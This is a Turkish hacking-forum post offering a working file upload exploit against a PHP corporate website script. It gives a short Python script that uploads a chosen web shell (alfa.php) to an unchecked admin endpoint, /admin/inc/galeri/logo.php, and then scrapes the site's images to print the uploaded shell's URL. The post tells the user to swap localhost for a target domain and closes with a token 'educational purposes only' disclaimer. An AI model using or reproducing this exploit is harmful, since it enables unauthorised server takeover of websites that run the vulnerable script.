Exploit Crealite Kurumsal Firma Scripti File Upload Exploit (1 Viewer)

Her veri alışverişinde güvenli bir şekilde pdo kullanmış olsalar dahi bir dosyada unuttukları kontrol önlemi yüzünden sisteme shell yükleyebilmekteyiz. İlgili script...

Her veri alışverişinde güvenli bir şekilde pdo kullanmış olsalar dahi bir dosyada unuttukları kontrol önlemi yüzünden sisteme shell yükleyebilmekteyiz.

İlgili script: https://www.phpscripttr.com/yeni-kurumsal-firma-scripti-indir-2020/

Exploit:
Python:
import requests
from bs4 import BeautifulSoup

url = "http://localhost"   # Burayı domain ile değiştir.
shell = "alfa.php"                      # Buradan shell seç - Exploit ile Shell aynı dizinde olmalıdır.

dosya = {"file": open(shell, "rb")}
yukle = requests.post(url+"/admin/inc/galeri/logo.php", files=dosya)
goster = requests.get(url)
kaynak = BeautifulSoup(goster.content,"lxml")
resimler = kaynak.find_all("img")
for i in resimler:
    if (i["src"].split(".")[1] == shell.split(".")[1]):
        print(url+"/"+i["src"])

Not: Sadece eğitim amaçlıdır. Yasadışı işlemlerden sorumluluk kabul etmemekteyim.

🔒 Bu içeriği görmek için giriş yapın

 
Yanıt yazmak için giriş yapmalısınız
Forum özelliklerini kullanmak ve Level 2 üyelik satın almak için hesabınıza giriş yapın.

Users who are viewing this thread

133,468Konular
3,282,659Mesajlar
321,371Kullanıcılar
exeflie162Son Üye
Üst Alt